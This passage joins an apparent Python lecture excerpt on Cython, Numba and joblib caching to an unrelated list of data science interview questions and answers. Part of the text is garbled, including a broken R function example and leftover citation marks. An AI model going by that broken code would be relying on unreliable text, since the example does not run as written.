Cython requires more expertise than Numba, and is a little more fiddly in terms of getting good performance.
In fact, it’s surprising how difficult it is to beat the speed improvements provided by Numba.
Nonetheless,
- Cython is a very mature, stable and widely used tool.
- Cython can be more useful than Numba when working with larger, more sophisticated applications.
!pip install joblib
Requirement already satisfied: joblib in /home/qebuild/anaconda3/lib/python3.7/site-packages (0.13.2)
from within a notebook.
Here we review just the basics.
Caching¶
Perhaps, like us, you sometimes run a long computation that simulates a model at a given set of parameters — to generate a figure, say, or a table.
20 minutes later you realize that you want to tweak the figure and now you have to do it all again.
What caching will do is automatically store results at each parameterization.
With Joblib, results are compressed and stored on file, and automatically served back up to you when you repeat the calculation.
An Example¶
Let’s look at a toy example, related to the quadratic map model discussed above.
Let’s say we want to generate a long trajectory from a certain initial condition $ x_0 $ and see what fraction of the sample is below 0.1.
(We’ll omit JIT compilation or other speedups for simplicity)
Here’s our code
from joblib import Memory location = './cachedir' memory = Memory(location='./joblib_cache') @memory.cache def qm(x0, n): x = np.empty(n+1) x[0] = x0 for t in range(n): x[t+1] = 4 * x[t] * (1 - x[t]) return np.mean(x < 0.1)
We are using joblib to cache the result of calling qm at a given set of parameters.
With the argument location=’./joblib_cache’, any call to this function results in both the input values and output values being stored a subdirectory joblib_cache of the present working directory.
(In UNIX shells, . refers to the present working directory)
The first time we call the function with a given set of parameters we see some extra output that notes information being cached
qe.util.tic() n = int(1e7) qm(0.2, n) qe.util.toc()
________________________________________________________________________________ [Memory] Calling __main__--home-qebuild-repos-quantecon.build.lectures-_source-lecture-source-py-_build-website-jupyter-executed-__ipython-input__.qm... qm(0.2, 10000000) ______________________________________________________________qm - 10.4s, 0.2min TOC: Elapsed: 0:00:10.40
10.408669471740723
The next time we call the function with the same set of parameters, the result is returned almost instantaneously
qe.util.tic() n = int(1e7) qm(0.2, n) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.0008406639099121094
Other Options¶
There are in fact many other approaches to speeding up your Python code.
One is interfacing with Fortran.
If you are comfortable writing Fortran you will find it very easy to create extension modules from Fortran code using F2Py.
F2Py is a Fortran-to-Python interface generator that is particularly simple to use.
Robert Johansson provides a very nice introduction to F2Py, among other things.
Recently, a Jupyter cell magic for Fortran has been developed — you might want to give it a try.
Exercise 1¶
Later we’ll learn all about finite-state Markov chains.
For now, let’s just concentrate on simulating a very simple example of such a chain.
Suppose that the volatility of returns on an asset can be in one of two regimes — high or low.
The transition probabilities across states are as follows
For example, let the period length be one month, and suppose the current state is high.
We see from the graph that the state next month will be
- high with probability 0.8
- low with probability 0.2
Your task is to simulate a sequence of monthly volatility states according to this rule.
Set the length of the sequence to
n = 100000 and start in the high state.
Implement a pure Python version, a Numba version and a Cython version, and compare speeds.
To test your code, evaluate the fraction of time that the chain spends in the low state.
If your code is correct, it should be about 2/3.
p, q = 0.1, 0.2 # Prob of leaving low and high state respectively
Here’s a pure Python version of the function
def compute_series(n): x = np.empty(n, dtype=np.int_) x[0] = 1 # Start in state 1 U = np.random.uniform(0, 1, size=n) for t in range(1, n): current_x = x[t-1] if current_x == 0: x[t] = U[t] < p else: x[t] = U[t] > q return x
Let’s run this code and check that the fraction of time spent in the low state is about 0.666
n = 100000 x = compute_series(n) print(np.mean(x == 0)) # Fraction of time x is in state 0
0.67497
Now let’s time it
qe.util.tic() compute_series(n) qe.util.toc()
TOC: Elapsed: 0:00:0.09
0.09005856513977051
Next let’s implement a Numba version, which is easy
from numba import jit compute_series_numba = jit(compute_series)
Let’s check we still get the right numbers
x = compute_series_numba(n) print(np.mean(x == 0))
0.66727
Let’s see the time
qe.util.tic() compute_series_numba(n) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.001298666000366211
This is a nice speed improvement for one line of code.
Now let’s implement a Cython version
%load_ext Cython
The Cython extension is already loaded. To reload it, use: %reload_ext Cython
%%cython import numpy as np from numpy cimport int_t, float_t def compute_series_cy(int n): # == Create NumPy arrays first == # x_np = np.empty(n, dtype=int) U_np = np.random.uniform(0, 1, size=n) # == Now create memoryviews of the arrays == # cdef int_t [:] x = x_np cdef float_t [:] U = U_np # == Other variable declarations == # cdef float p = 0.1 cdef float q = 0.2 cdef int t # == Main loop == # x[0] = 1 for t in range(1, n): current_x = x[t-1] if current_x == 0: x[t] = U[t] < p else: x[t] = U[t] > q return np.asarray(x)
compute_series_cy(10)
array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
x = compute_series_cy(n) print(np.mean(x == 0))
0.67253
qe.util.tic() compute_series_cy(n) qe.util.toc()
TOC: Elapsed: 0:00:0.00
0.003190279006958008
The Cython implementation is fast but not as fast as Numba. | https://lectures.quantecon.org/py/sci_libs.html | CC-MAIN-2019-35 | refinedweb | 1,927 | 66.44 |
How can i return some value to server from client machine
Discussion in 'ASP .Net' started by Joby,52
- Joby
- May 14, 2004
Server to server = Server client to server?-, Jul 29, 2005, in forum: Java
- Replies:
- 2
- Views:
- 431
- Alan Krueger
- Jul 29, 2005
what value does lack of return or empty "return;" returnGreenhorn, Mar 3, 2005, in forum: C Programming
- Replies:
- 15
- Views:
- 866
- Keith Thompson
- Mar 6, 2005
Web Service Client Cannot Connect to Web Service From Some Machine, Oct 11, 2005, in forum: ASP .Net Web Services
- Replies:
- 0
- Views:
- 223
Syntax bug, in 1.8.5? return not (some expr) <-- syntax error vsreturn (not (some expr)) <-- fineGood Night Moon, Jul 22, 2007, in forum: Ruby
- Replies:
- 9
- Views:
- 305
- Rick DeNatale
- Jul 25, 2007 | http://www.thecodingforums.com/threads/how-can-i-return-some-value-to-server-from-client-machine.78046/ | CC-MAIN-2014-49 | refinedweb | 129 | 62.82 |
Viewer component which moves the camera in a plane.
More...
#include <Inventor/Wx/viewers/SoWxPlaneViewer.h>
The Plane viewer component allows the user to translate the camera in the viewing plane, as well as dolly (move foward/backward) and zoom in and out. The viewer also allows the user to roll the camera (rotate around the forward direction) and seek to objects which will specify a new viewing plane. This viewer could be used for modeling, in drafting, and architectural work. The camera can be aligned to the X, Y or Z axes.
Left Mouse or
Left + Middle Mouse: Dolly in and out (gets closer to and further away from the object).
Middle Mouse or
Ctrl + Left Mouse: Translate up, down, left and right.
Ctrl + Middle Mouse: Used for roll action (rotates around the viewer forward direction).
<s> + Left Mouse: Alternative to the Seek button. Press (but do not hold down) the <s> key, then click on a target object.
Right Mouse: Open the popup menu.
ALT : (Win32) When the viewer is in selection (a.k.a. pick) mode, pressing and holding the ALT key temporarily switches the viewer to viewing mode. When the ALT key is released, the viewer returns to selection mode. Note: If any of the mouse buttons are currently depressed, the ALT key has no effect.ExaminerViewer,
Constructor which specifies the viewer type.
Please refer to SoWxViewer for a description of the viewer types.
Destructor.
Sets the edited camera.
Setting the camera is only needed if the first camera found in the scene when setting the scene graph isn't the one the user really wants to edit.
Reimplemented from SoWxFullViewer..
Moves the camera to be aligned with the given plane.. | https://developer.openinventor.com/refmans/9.9/RefManCpp/class_so_wx_plane_viewer.html | CC-MAIN-2020-16 | refinedweb | 285 | 75.1 |
Setting up a bug for use with experimental versions supporting new web font formats. Currently there are several formats being discussed on the www-font mailing list, primarily .webfont, EOT-Lite and ZOT. All are basically wrapper formats around OpenType/TrueType font data.
Created attachment 392223 [details] [diff] [review] patch to support downloadable fonts in .zot format This is the patch I used to build an experimental version with .zot support. It's not complete - for one thing, I didn't implement a separate font-format hint for .zot - but seemed to work OK.
Created attachment 392381 [details] [diff] [review] patch, support EOT-Lite fonts Initial patch to load EOT-Lite formatted fonts. I omitted the version check, since this is still under discussion and various tools use a myriad set of versions. Support for a version hint is not included. Testcase example: Next step is to take Jonathan's patch and add in zot support.
Created attachment 392422 [details] [diff] [review] patch, integrate support for both EOT-Lite and ZOT Adds in support for zot fonts and fixes bug in original EOT-Lite patch. Memory handling of zot fonts is hacky here, maintain a list of decode buffer pointers and clear them out when gfxUserFontSet is taken down (ick). Test page with ZOT fonts:
Try server build here: Test pages for direct linking, EOT-Lite and ZOT formats: Enjoy!
Created attachment 393284 [details] [diff] [review] patch, integrate support for EOT-Lite and WebOTF (replacing ZOT) > GFX_USERFONT_ZOT = 4, > - GFX_USERFONT_WEBFONT = 5 > + GFX_USERFONT_WEBOTF = 5 Why did you replace .webfont rather than ZOT?
Err.... no particular reason; WebOTF is a hybrid of the two, actually. AFAIK the webfont constant was just a placeholder, it hadn't been implemented anyway.
Then GFX_USERFONT_ZOT is no longer required, I think.
Created attachment 393346 [details] [diff] [review] updated EOTL + WebOTF patch Oops, previous version of the patch used an obsolete header format for WebOTF. :( Also eliminated the GFX_USERFONT_ZOT constant.
Created attachment 397353 [details] [diff] [review] updated patch for current trunk, supporting WOFF only (not EOTL) This version of the patch uses code based on the latest rev of the WOFF (formerly WebOTF) spec. There is a test page using Gentium in WOFF format, as well the spec itself and code for font-conversion tools, all available from.
Created attachment 397357 [details] [diff] [review] fixing bug in previous patch Sorry for the bugspam - previous patch wasn't properly refreshed. :(
Created attachment 397546 [details] [diff] [review] updated WOFF patch with new buffer management for downloaded font data This version of the patch reworks the management of the downloaded data, based on some discussion with Roc. The basic idea here is that once the font data is downloaded, ownership of the data is passed from the nsStreamLoader to the gfxUserFontSet, for use when creating a new gfxFontEntry. And if the font entry requires the data to persist (which is the case for Freetype fonts, I believe), it takes over responsibility for the buffer. To do this, the downloaded data is stored as an nsTArray<PRUint8>, so that we can use SwapElements to transfer ownership of the actual data buffer between objects as needed.
Comment on attachment 397546 [details] [diff] [review] updated WOFF patch with new buffer management for downloaded font data I like the fix you and roc came up with, that's much better than existing code. I'm going to ask jduell to review the netwerk portion of the patch, it makes sense to me. But I'm minusing the review here due to buffer overrun issues in the woff.c code (see below). > +// for use with EOT-Lite header, native data in little-endian form > +#ifdef IS_LITTLE_ENDIAN > +#define NS_LE_SWAP16(x) (x) > +#define NS_LE_SWAP32(x) (x) > +#else > +#define NS_LE_SWAP16(x) ((((x) & 0xff) << 8) | (((x) >> 8) & 0xff)) > +#define NS_LE_SWAP32(x) ((NS_LE_SWAP16((x) & 0xffff) << 16) | (NS_LE_SWAP16((x) >> 16))) > +#endif Don't need this code along with the AutoSwapLE classes below this, it's only for EOT-Lite usage. > + default: > + // should we have a warning here? > + break; A NS_WARNING here would be nice. > +const char * woffEncode(const char * sfntData, uint32_t sfntLen, > + uint16_t majorVersion, uint16_t minorVersion, > + uint32_t * woffLen, uint32_t * status); I don't see any reason to use char * here rather than uint8_t *. > + origLen = READ32BE(woffDir[i].origLen); > + compLen = READ32BE(woffDir[i].compLen); > + if (offset + origLen > totalLen) { > + break; > + } > + memcpy(sfntData + offset, > + woffData + READ32BE(woffDir[i].offset), origLen); This code allows reads/writes past the end of buffers. If origLen == 0xFFFFFFFF and compLen == origLen, a crash will almost certainly occur in memcpy, since the sum 'offset + origLen' would overflow into offset - 1 and satisfy the overflow check. I think something like this would fix it: if (offset + origLen > totalLen && offset + origLen > offset) + offset += origLen; + while ((offset & 3) != 0) { + sfntData[offset++] = 0; + } This also allows potentially writing off the end of the output buffer. + head = (sfntHeadTable *)(sfntData + headOffset); + head->checkSumAdjustment = 0; + csumPtr = (const uint32_t *)sfntData; + while (csumPtr < (const uint32_t *)(sfntData + totalLen)) { + csum += READ32BE(*csumPtr); + csumPtr++; + } + csum = 0xb1b0afbaU - csum; + head->checkSumAdjustment = READ32BE(csum); This seems like a bit of a spec issue to me, implementations shouldn't be required to recompute checksums, this seems like it's better handled by tools. When recalculation is needed, it would be better I think to calculate this from the checksums in the table headers rather than making yet another pass over the data file. Current implementations ignore the checksum. It would be nice to disable all the encoding code in woff.c. Maybe a simple conditional DISABLE_ENCODING or something like that, with the default being to compile everything and the conditional defined in the makefile. The sfnt structures in woff-private.h and woff.c all appear to be short aligned but I think for safety you should have a #pragma pack(1) there so that the code doesn't implicitly assume a given alignment within TrueType structures. I haven't yet taken a close look at the encoding routines, I think those may need to change based on discussions related to checksums.
Created attachment 397903 [details] [diff] [review] updated patch addressing review comments This should fix the potential buffer overflows in decoding, and handles the checksum recalculation more efficiently.
Created attachment 397946 [details] [diff] [review] further sanity-checking in the WOFF code; omit encoding functions Sorry for the bugspam, but I have added some more error-checking to the woff.c functions, and the Makefile option to skip compiling the encoding functions (forgot to finish that last time). Regarding the font checksum, I'd prefer not to require specific behavior in the encoder (with regard to table ordering, etc), but instead have added a note to the spec pointing out that a decoder needs to recalculate the checksum and update it in the 'head' table. I've modified the decoding function in woff.c to do this without scanning the entire font; only the new sfnt table directory needs to be summed, along with the per-table checksums (which are stable). This makes it a very cheap operation, and it's much simpler this way than trying to write and explain a spec that involves calculating a "predicted" checksum for the decoded font during the encoding process.
Created attachment 399738 [details] [diff] [review] add extractData() method to nsIStreamLoader, to support new web-font implementation This patch adds an extractData() method on nsIStreamLoader to fetch the data into a caller-provided array. The issue here is that for downloaded fonts (@font-face), it makes most sense for the gfx classes to manage the lifetime of the data once it has been downloaded; depending on the font format and the platform, it may be quickly discarded or it may need to be held until we are finished with the font. The new extractData() method allows the caller to obtain the downloaded data in an nsTArray, and deletes it from the loader; by using SwapElements(), we can do this without having to copy the (potentially large) buffer of font data. The loader can then be safely destroyed, and the gfx classes have sole responsibility for the font data.
Created attachment 399740 [details] [diff] [review] updated WOFF patch corresponding to the 2009-09-10 specification This depends on the preceding patch to nsIStreamLoader. Tryserver builds available at
The proposed nsIStreamLoader API worries me, because it's so easy to misuse. Once you extract, you suddenly have this data pointer you were given that points to .... where? The data you extracted? Something else? I'm not quite sure what a better approach is, though. Would it make sense to just manually realloc in the streamloader instead of using a TArray and then have a success code the consumer can return for "I took ownership of this data"? That doesn't help the consumer get it into TArray form, though....
(In reply to comment #18) > I'm not quite sure what a better approach is, though. Would it make sense to > just manually realloc in the streamloader instead of using a TArray and then > have a success code the consumer can return for "I took ownership of this > data"? That's good enough for us. Should we do that?
I think I would prefer that, yeah.
Created attachment 400443 [details] [diff] [review] revised nsIStreamLoader patch Revised the network patch to allow the observer to take over the data pointer by returning a custom success code. (Corresponding WOFF patch will follow.)
Created attachment 400479 [details] [diff] [review] updated WOFF patch to work with revised streamloader This seems to work ok here on Mac, Windows, and Linux. Not thoroughly tested (including invalid fonts, etc) yet.
Comment on attachment 400443 [details] [diff] [review] revised nsIStreamLoader patch >+++ b/netwerk/base/public/nsIStreamLoader.idl >+ * If the observer wants to take over responsibility for the >+ * data buffer (result), it returns NS_SUCCESS_ADOPTED_DATA >+ * in place of NS_OK as its success code. The loader will then >+ * "forget" about the data, and not free() it in its own >+ * destructor; observer must call free() when the data is >+ * no longer required. Those should be NS_Free, not free(). And the various allocation/deallocation in this patch should use NS_Malloc, NS_Free, NS_Realloc >+++ b/netwerk/base/src/nsStreamLoader.cpp >@@ -119,17 +145,34 @@ nsStreamLoader::WriteSegmentFun(nsIInput >+ if (count > 0xffffffffU - self->mLength) { >+ return NS_ERROR_ILLEGAL_VALUE; // is there a better error to use here? Did you want PR_UNIT32_MAX instead of the hex constant? Could just use NS_ERROR_OUT_OF_MEMORY here too, I guess, but ILLEGAL_VALUE is maybe better. >+++ b/netwerk/base/src/nsStreamLoader.h >+ PRUint32 mAllocated; >+ PRUint32 mLength; Please document the difference. r=bzbarsky with those nits picked.
Created attachment 400504 [details] [diff] [review] corrected patch to fix broken build on windows mobile
Created attachment 400543 [details] [diff] [review] updated nsIStreamLoader patch to address review comments
Created attachment 400547 [details] [diff] [review] updated WOFF patch to sync with reviewed streamloader patch
John, FYI: I've found a potential segfault in the woff decoder (a bogus offset in the table directory can cause it to read from an invalid address). Fixed this locally, but I'll wait for additional comments from you before posting yet another version of the patch, as I'm sure you'll find some things too.
Created attachment 400603 [details] [diff] [review] reftests for font loading using TTF and WOFF formats, good and bad files These are some reftests for @font-face loading, based on a small font from openfontlibrary.org. We test that both .ttf and .woff formats load, then test versions with bad checksums (which should still load) and some invalid files that should NOT load. (There are of course many more kinds of invalid font error that could be tested; this is just a beginning.). > + // mFontData holds the data used to instantiate the FT_Face; > + // this has to persist until we are finished with the face, > + // then be released with NS_Free(). > + const PRUint8* mFontData; As above, use nsAutoPtr<const PRUint8> instead? > PRBool > gfxUserFontSet::OnLoadComplete(gfxFontEntry *aFontToLoad, > nsISupports *aLoader, > const PRUint8 *aFontData, PRUint32 aLength, > nsresult aDownloadStatus) The stream loader has been trimmed out below this layer and should be trimmed out here also. > +/* These macros to read values as big-endian only work on "real" variables, > + not general expressions, because of the use of &(x), but they are > + designed to work on both BE and LE machines without the need for a > + configure check. For production code, we might want to replace this > + with something more efficient. */ > +/* read a 32-bit BigEndian value */ > +#define READ32BE(x) ( ( (uint32_t) ((uint8_t*)&(x))[0] << 24 ) + \ > + ( (uint32_t) ((uint8_t*)&(x))[1] << 16 ) + \ > + ( (uint32_t) ((uint8_t*)&(x))[2] << 8 ) + \ > + (uint32_t) ((uint8_t*)&(x))[3] ) > +/* read a 16-bit BigEndian value */ > +#define READ16BE(x) ( ( (uint16_t) ((uint8_t*)&(x))[0] << 8 ) + \ > + (uint16_t) ((uint8_t*)&(x))[1] ) I think it would be better to conditionalize these on MOZILLA_CLIENT and use the PR_SWAP macros instead when building for Mozilla. > +typedef struct { > + uint32_t tag; > + uint32_t offset; > + uint16_t oldIndex; > + uint16_t newIndex; > +} tagAndOffset; I think this can be reduced to just the offset and oldIndex fields, the tag can always be referenced from the "old" data and newIndex is simply the index in the array. The woffDecode routine calls woffGetDecodedSize which calls sanityCheck. After that woffDecode calls woffDecodeToBuffer which again calls sanityCheck. Better to have static internal functions for woffGetDecodedSize and woffDecodeToBuffer which assume sanityCheck has already been called, then call sanityCheck in woffDecode so that sanityCheck is only called once within woffDecode. Right now sanityCheck only looks at header values, might be handy if it explicitly checked all the woff directory entries to test (1) the sum of the origLen values does not overflow and is equal to totalSfntSize, (2) validate the offset/lengths point to valid ranges within the original data and (3) compLen <= origLen is true for all values (the spec says compLen > origLen is invalid but the code treats this as compLen == origLeng (i.e. uncompressed)). Within woffDecodeToBuffer: > + if (compLen < origLen) { > + uint32_t sourceOffset = READ32BE(woffDir[tableIndex].offset); > + uLongf destLen = origLen; > + if (uncompress((Bytef *)(sfntData + offset), &destLen, > + (const Bytef *)(woffData + sourceOffset), > + compLen) != Z_OK || destLen != origLen) { > + FAIL(eWOFF_compression_failure); > + } > + } else { > + uint32_t sourceOffset = READ32BE(woffDir[tableIndex].offset); > + memcpy(sfntData + offset, woffData + sourceOffset, origLen); > + } As noted above, compLen > origLen should be an error. Also, you're not validating the woff offset so a read past the end of the buffer seems possible. > + while (offset < totalLen && (offset & 3) != 0) { > + sfntData[offset++] = 0; > + } This will pad all but the last table, I think we should probably be careful about padding even the last table. > + while (csumPtr < (const uint32_t *)(sfntData + 12 + > + numTables * sizeof(sfntDirEntry))) { Change the '12' here to sizeof(sfntHeader). > + csum = 0xb1b0afbaU - csum; This should be a named constant similar to HEAD_CHECKSUM_CALC_CONST in gfxFontUtils.cpp. > + sfntData = (uint8_t *) malloc(bufLen); Calls to free, malloc and realloc should be #define'd to PR_FREE, etc. when MOZILLA_CLIENT is defined (plus prmem.h included). I only looked at the decode routines today since those are the ones that affect Mozilla production code. The encode routines don't affect the build (unless the format changes) so they can be changed without review. I'm going to play around with those tomorrow.
In woffGetMetadata: > + uint32_t offset, compLen; > + uLong origLen; > + uint8_t * data = NULL; Change uLong to uint32_t? + if (offset + compLen > woffLen) { + FAIL(eWOFF_invalid); + } This doesn't handle the case where (offset + compLen) overflows. Same comment for woffGetPrivateData. +#ifndef WOFF_DISABLE_ENCODING Maybe this should be #ifndef MOZILLA_CLIENT instead. And we shouldn't be compiling woffGetMetadata, woffGetPrivateData, woffGetFontVersion since they're not used. I also spotted a few unused variables, not sure why the compiler isn't flagging those more clearly: woffEncode - totalLength woffGetDecodedSize - numTables
(In reply to comment #29) >. AIUI, we can't do that: the memory was allocated via NS_Alloc, not operator new. nsAutoPtr would try to use operator delete to free it, which is wrong.
Right. If we can guarantee that no one will ever use this interface across modules (which we can't even for Firefox in a non-libxul build), then we could use nsAutoPtr. As it is, we're stuck with doing it all through the XPCOM allocator...
Created attachment 400807 [details] [diff] [review] improved woff validation, improved comments re buffer ownership, etc (In reply to comment #29) >. It's not clear to me that an nsAutoPtr-like model would be all that much clearer really. (See for some comments!) Once we start passing nsAutoPtr around between routines, the ownership and copying behavior has plenty of scope for errors. For example, passing a reference to nsAutoPtr into MakePlatformFont *might* result in the caller's pointer becoming null, depending whether the MakePlatformFont implementation (or something it calls) chooses to copy the pointer. That's not at all obvious at the call site. Anyhow, we can't use nsAutoPtr for an NS_Alloc'ed block. So what I have done instead is to add more comments, trying to document more explicitly where ownership of the font data is passing from one object to another. I've also set aFontData to NULL in OnLoadComplete after calling MakePlatformFont, so it's clear that this pointer is no longer usable. See if you think this is a reasonable approach. This update should also address the various comments relating to the WOFF-decoding functions. And while this is in flux, I've moved the call to ValidateSFNTHeaders into gfxUserFontSet, so it's done in one place before calling MakePlatformFont. The previous version of the patch broke one of the @font-face reftests (fallback after a bad src url was broken); this now passes them all reftests locally. Pushing to tryserver for confirmation.
Created attachment 400838 [details] [diff] [review] fix silly error on Windows in the previous patch
Created attachment 400839 [details] [diff] [review] add a "woff" format hint to @font-face This adds a format hint ("woff") for the new format. Does this also need to be mentioned in the CSS fonts spec or somewhere like that?
Created attachment 400840 [details] [diff] [review] update reftests to include "woff" format hint Update the reftests to include a simple check that the "woff" hint is accepted.
Created attachment 400966 [details] the DeLarge fonts (ttf, woff, and damaged) used in several tests
Comment on attachment 400838 [details] [diff] [review] fix silly error on Windows in the previous patch Looks good. Not really happy with MakePlatformFont having to delete the font data, it still feels odd but I guess I can live with this. One small nit: > +#ifdef WOFF_MOZILLA_CLIENT > +# include <prnetdb.h> > +# define READ32BE(x) PR_ntohl(x) > +# define READ16BE(x) PR_ntohs(x) > +#else Make these NS_SWAP32 and NS_SWAP16 macros rather than function call versions.
Comment on attachment 400839 [details] [diff] [review] add a "woff" format hint to @font-face I'll add the "woff" hint when I do another round of CSS3 Fonts spec edits.
Comment on attachment 400840 [details] [diff] [review] update reftests to include "woff" format hint Looks good. No need for the nofont version, just make the bad font cases != ref version. (nsIStreamLoader) (implement WOFF) (format hint) (reftests)
Created attachment 401197 [details] [diff] [review] updated woff patch following final review comments Uses a local copy of the byte-swap macros in woff-private.h because NS_SWAP16/32 are defined in a C++ header that we cannot include here.
Requesting 1.9.2 approval for the WOFF patches (three code patches, plus tests) as we would like to be able to announce that the new font format will be supported in FF3.6.
Additional comments re the request for 1.9.2 approval: This is the new web font format that has been thrashed out between ourselves and others; it has the endorsement of dozens of font designers and vendors, and offers the potential to become a truly interoperable web font solution. Other browser vendors have generally expressed a willingness to implement this if they see it being adopted; we are in a position to kick-start this process if we can announce that it will be supported in our upcoming FF 3.6 release. If we miss FF 3.6, so that WOFF support will not be in our shipping product until 3.7, we may lose the current momentum and font-vendor support, and end up with a much more fragmented web-font world as alternative EOT-based solutions (that we consider inferior) are pushed elsewhere. The code has landed on trunk without problems, and should be safe to land on 1.9.2; I have checked locally that it applies, builds, and tests successfully on the branch. I believe it to be a low-risk feature: although it is a new file format to support, the main decoding is done by zlib (stable, well-tested code), and the result is standard OpenType data that is then handled by our existing font and text code. There is no impact on font and text usage for existing pages that do not use the new format. The actual interpretation of the WOFF file structure is of course new code, so John and I have tried to ensure that this is safe from overflows, etc. On the other hand, once a WOFF file has been decoded to OpenType form, we can actually be more confident that the data we're handing to the (sometimes fragile) platform font APIs is structurally valid than with fonts that are downloaded directly in OpenType format.
(In reply to comment #44) > The code has landed on trunk without problems, and should be safe to land on > 1.9.2; I have checked locally that it applies, builds, and tests successfully > on the branch. I posted a 1.9.2 try server build with attachment 401197 [details] [diff] [review] in order to make sure that this doesn't break tests/talos on this branch. I have tagged the build with "woff"; please watch the try tree for results in the next few hours.
The patch doesn't compile, see: <>.
As noted in comment #43, there are three code patches, plus the tests. Your tryserver build only included patch #2 of 3, so this failure is entirely expected. I am currently re-testing a complete rollup patch on an updated 1.9.2 tree, and will post it here after a successful local build and test.
Created attachment 402191 [details] [diff] [review] rolled-up patch with all code changes + tests, for 1.9.2
1.9.2-based tryserver builds at
Current WOFF spec:
Mention added to the docs on @font-face here:
(In reply to comment #51) > Mention added to the docs on @font-face here: > > I see that document now says Gecko 1.9.2 (Firefox 3.6) added support for WOFF but this may be premature, as we don't yet know if it will be approved for 1.9.2. The code is on trunk, which means it should go into 1.9.3 (presumably for FF 3.7), but still waiting for a response to the a192 request.
Whoops, I misread a comment earlier, thought it said this was checked in on 1.9.2, but it's just that there's a patch ready. I'll revise the text.
Comment on attachment 402191 [details] [diff] [review] rolled-up patch with all code changes + tests, for 1.9.2 a192=shaver
Refreshed patch and pushed to branch:
Fine. Now should there be another bug about EOT Lite support?
(In reply to comment #56) > Fine. Now should there be another bug about EOT Lite support? I agree. Please file it.
Filed: bug 520357 | https://bugzilla.mozilla.org/show_bug.cgi?id=507970 | CC-MAIN-2017-26 | refinedweb | 3,877 | 61.06 |
Post your Comment
Generate shuffling in the specified list
", "Komal"};
// create list for the specified array of employee.
List... to generate number randomly.
Random num = new Random();
// shuffle and print the list according to the generated random number
Shuffling the Element of a List or Array
Shuffling the Element of a List or Array
Shuffling is the technique i.e. used to randomize.... In this section, you will learn about shuffling the
element of a list or array. Shuffling
plz try to clear my doubt for shuffling multi-dimensional array
plz try to clear my doubt for shuffling multi-dimensional array hi, if v r using Arrays.asList() means, it may shuffle the row wise list only... v... List<Integer> list = new ArrayList<Integer>();
public
Retrieve a list of words from a website and show a word count plus a specified number of most frequently occurring words
Retrieve a list of words from a website and show a word count plus a specified...
3. Read the (word, num_occurrences) map entry pairs into an array/list structure... an array/list structure to hold WordPair objects
* Iterate through
List In Java
Of List Interface
boolean add(E e) : This method adds the specified element... at the specified index from the list, iterate
over the list, replace the specified list...List In Java
In this section we will read about the List data structure
list - Java Interview Questions
true if this list contains the specified element. More formally, returns true...list Hi all
Naturally in java a list will allow duplicates, but if i want the list which shouldn't allow duplicates then what should be the logic
List
List i do have one list object, i want to compare this list from database table and if match found i want to update the list
List
List getting values from a form and make a list of them and store them into database
J2ME List Image
J2ME List Image
List Image MIDlet Example
This example illustrates how to create list with image symbol. In this
example we are trying to create list using of List class
Java Util Examples List
;
Shuffling the Elements of a List or Array
Shuffling is the technique i.e. used to randomize the
list or array to prepare... about shuffling the element of a list or array.
What
specified in the Optional Package
specified in the Optional Package What types of DataSource objects are specified in the Optional Package
the Action Mapping specified
the Action Mapping specified How is the Action Mapping specified
ActionMapping and is the Action Mapping specified
ActionMapping and is the Action Mapping specified What is ActionMapping and is the Action Mapping specified
Introduction to List and Queue Interface
searching a specified object in the
list and returns its numerical... Introduction to List and Queue Interface
List Interface
Java list files
Java list files
In this section, you will learn how to display the list... an array of all
the files and directories of the specified directory.
Here..., you can display list of files from any directory.
Output
Java list directories
Java list directories
In this section, you will learn how to display the list... used the methods of File class to retrieve the list of directories
from... and directories of the specified directory.
Here is the code:
import
List with out duplicates - Java Interview Questions
o)
Returns true if this list contains the specified element. More formally...List with out duplicates Hi all,
Naturally in java a list will allow duplicates, but if i want the list which shouldn't allow duplicates
Java get File List
Java get File List
... and folders
from the specified directory. In the given example, we are providing... in the specified directory with their pathname.
file.length()- This method returns
SQL Aggregate Functions List
SQL Aggregate Functions List
SQL Aggregate Functions List describe you the Aggregate Function List
Queries. The Aggregate Function include the average, count, min, max, sum etc
Inserting a New Entry in a List
Inserting a New Entry in a List
... in code given below for Inserting a new Entry in List:-
Element person... of the specified node.
Text nametextNode = doc.createTextNode(name):-This
method
Linked List Example
Linked List Example
... of List interface. We are using two classes ArrayList and
LinkedList...
many List operations. Lets discuss
the example code.
Description of program
Java Directory - Directory and File Listing Example in Java
;
This example illustrates how to list files and
folders present in the specified....
Explanation
This program list the file of the specified directory. We will be
declaring a function called dirlist which
List interface
List interface What is the List interface
Post your Comment | http://roseindia.net/discussion/21903-Generate-shuffling-in-the-specified-list.html | CC-MAIN-2015-35 | refinedweb | 780 | 53.1 |
1. What is Data Science? How would you say it is similar or different to business analytics and business intelligence?
Data science is a field that deals with analysis of data. It studies the source of information, what the information represents and turning it into a valuable resource by giving insights of the data that are later used for creating strategies. It is a combination of business perspectives, computer programming and statistical techniques.
Business analytics or simply analytics is the core of business intelligence and data science. Data science is a relatively new term used for analysis of big data and giving insights.
Analytics generally has higher degree of business perspectives than data science which is more programming heavy. The terms are however used interchangeably..
3. Python or R – Which one would you prefer for text analytics?
The best possible answer for this would be Python because it has Pandas library that provides easy to use data structures and high performance data analysis tools.
Desired to gain proficiency on Data Science? Explore the blog post on Data Science Training to become a pro in Data Science.
4. How do you build a custom function in Python or R?
In R: function command
The structure of a function is given below:
myfunction <- function(arg1, arg2, … ){
statements
return(object)
})])
# 4
5. Which package is used to do data import in R and Python? How do you do data import in SAS?
We can do data import using multiple methods:
– In R we use RODBC for RDBMS data, and data.table for fast import.
– We use jsonlite for JSON data, foreign package for other languages like SPSS
– We use data and sas7bdat package for SAS data.
– In Python we use Pandas package and the commands read_csv , read_sql for reading data. Also, we can use SQLAlchemy in Python for connecting to databases.
6. What is an RDBMS? Name some examples for RDBMS? What is CRUD?
A relational database management system (RDBMS) is a database management system that is based on a relational model. The relational model uses the basic concept of a relation or table. RDBMS is the basis for SQL, and for database systems like MS SQL Server, IBM DB2, Oracle, MySQL, and Microsoft Access.
In computer programming, create, read, update and delete[1] (as an acronym CRUD or possibly a backronym) (Sometimes called SCRUD with an “S” for Search) are the four basic functions of persistent storage.
7. How do you check for data quality?
Data quality is an assessment of data’s fitness to serve its purpose in a given context. Different aspects of data quality include:
– Accuracy
– Completeness
– Update status
– Relevance
– Consistency across data sources
– Reliability
– Appropriate presentation
– Accessibility
